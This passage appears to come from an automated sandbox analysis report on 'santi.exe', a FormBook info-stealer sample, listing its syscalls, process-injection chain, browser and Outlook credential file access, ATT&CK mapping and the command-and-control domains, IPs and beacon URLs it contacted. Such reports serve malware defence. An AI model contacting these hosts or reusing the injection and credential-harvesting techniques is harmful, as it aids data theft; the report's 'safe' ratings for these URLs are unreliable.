                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\santi.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeSection loaded: NULL target: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeSection loaded: NULL target: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 7960Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\msdt.exeThread APC queued: target process: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\santi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A2008Jump to behavior
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031B106 LogonUserW,0_2_0031B106
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002E3D19
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032411C SendInput,keybd_event,0_2_0032411C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003274BB mouse_event,0_2_003274BB
                Source: C:\Users\user\Desktop\santi.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\santi.exe"Jump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeProcess created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0031A66C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003271FA
                Source: santi.exe, lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: santi.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_003065C4 cpuid 0_2_003065C4
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0033091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0033091D
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0035B340 GetUserNameW,0_2_0035B340
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00311E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00311E8E
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002FDDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: santi.exeBinary or memory string: WIN_81
                Source: santi.exeBinary or memory string: WIN_XP
                Source: santi.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: santi.exeBinary or memory string: WIN_XPe
                Source: santi.exeBinary or memory string: WIN_VISTA
                Source: santi.exeBinary or memory string: WIN_7
                Source: santi.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00338C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00338C4F
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0033923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0033923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561742 Sample: santi.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 www.losmason.shop 2->28 30 www.n-vis.group 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 48 3 other signatures 2->48 10 santi.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->62 64 Writes to foreign memory regions 10->64 66 2 other signatures 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 lavilIyGJqg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 msdt.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 2 other signatures 19->56 22 lavilIyGJqg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.losmason.shop 104.18.73.116, 49849, 49855, 49862 CLOUDFLARENETUS United States 22->34 36 www.n-vis.group 90.156.201.74, 49808, 80 MASTERHOST-ASMoscowRussiaRU Russian Federation 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                santi.exe61%ReversingLabsWin32.Trojan.AutoitInject
                santi.exe47%VirustotalBrowse
                santi.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.n-vis.group1%VirustotalBrowse
                www.gkfundeis.net1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.395608.men/vje0/0%Avira URL Cloudsafe
                http://www.espiritismo.info0%Avira URL Cloudsafe
                http://www.incgruporxat.click/ryxy/0%Avira URL Cloudsafe
                http://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.losmason.shop/uktz/0%Avira URL Cloudsafe
                http://www.n-vis.group/lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MH0%Avira URL Cloudsafe
                http://www.incgruporxat.click/ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.espiritismo.info/4knb/0%Avira URL Cloudsafe
                https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt0%Avira URL Cloudsafe
                http://www.gkfundeis.net/zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.holytur.net/oeev/0%Avira URL Cloudsafe
                http://www.holytur.net/oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8s0%Avira URL Cloudsafe
                http://www.gkfundeis.net/zd1g/0%Avira URL Cloudsafe
                http://www.lirio.shop/qp0h/0%Avira URL Cloudsafe
                http://www.395608.men/vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.dialagiaja18.buzz/o7bo/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.n-vis.group
                		90.156.201.74
                		truefalseunknown
                www.gkfundeis.net
                		62.116.130.8
                		truefalseunknown
                5w23j7d4.n.fly8899.com
                		207.148.38.19
                		truefalse
                  		unknown
                  www.lirio.shop
                  		13.248.169.48
                  		truefalse
                    		unknown
                    dialagiaja18.buzz
                    		66.29.148.78
                    		truefalse
                      		unknown
                      www.losmason.shop
                      		104.18.73.116
                      		truetrue
                        		unknown
                        holytur.net
                        		185.106.208.3
                        		truefalse
                          		unknown
                          www.incgruporxat.click
                          		104.21.88.139
                          		truefalse
                            		unknown
                            espiritismo.info
                            		3.33.130.190
                            		truefalse
                              		unknown
                              www.395608.men
                              		unknown
                              		unknownfalse
                                		unknown
                                www.holytur.net
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.espiritismo.info
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.dialagiaja18.buzz
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpjtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.incgruporxat.click/ryxy/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.395608.men/vje0/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.losmason.shop/uktz/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.gkfundeis.net/zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpjfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.incgruporxat.click/ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpjfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.espiritismo.info/4knb/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.n-vis.group/lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MHfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.holytur.net/oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8sfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.gkfundeis.net/zd1g/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.holytur.net/oeev/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.dialagiaja18.buzz/o7bo/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lirio.shop/qp0h/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.395608.men/vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpjfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

